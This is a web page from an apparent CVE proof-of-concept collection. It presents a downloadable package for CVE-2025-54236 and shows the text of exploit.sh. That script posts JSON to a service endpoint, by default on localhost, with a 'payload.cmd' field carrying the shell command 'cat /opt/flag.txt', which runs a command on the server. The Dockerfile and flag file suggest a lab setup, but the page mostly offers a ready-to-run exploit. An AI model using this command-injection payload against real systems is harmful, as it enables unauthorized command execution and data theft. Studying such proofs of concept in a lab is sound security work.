CVE-2025-54236 – CVE Helper · 32BitZ

CVE Helper 32BITZ

4837 Total CVEs

26 Years

// Info

CVE ID CVE-2025-54236

Year 2025

Type Proof of Concept

Files 5 (4 POC + README)

Source 32BitZ-Studio/Total-POC-CVE

View Folder on GitHub Download POC (.zip) Back to list

// POC Scripts

MD

DISCLAIMER.md 252 B

View Source GitHub Raw

?

Dockerfile 524 B

View Source GitHub Raw

SH

entrypoint.sh 361 B

View Source GitHub Raw

SH

exploit.sh 342 B

View Source GitHub Raw

README.md

Rendering markdown...

POC / exploit.sh SH

⬇ Raw GitHub ✕ Close

#!/usr/bin/env bash
set -euo pipefail
URL="${1:-http://localhost:8080/public/api/service.php}"

echo "[*] Exploiting nested JSON -> payload.cmd to read /opt/flag.txt ..."
curl -s -X POST "$URL" \
  -H "Content-Type: application/json" \
  --data '{"session":{"user":"guest"},"payload":{"cmd":"cat /opt/flag.txt"}}' \
  | sed -e 's/^/[FLAG] /'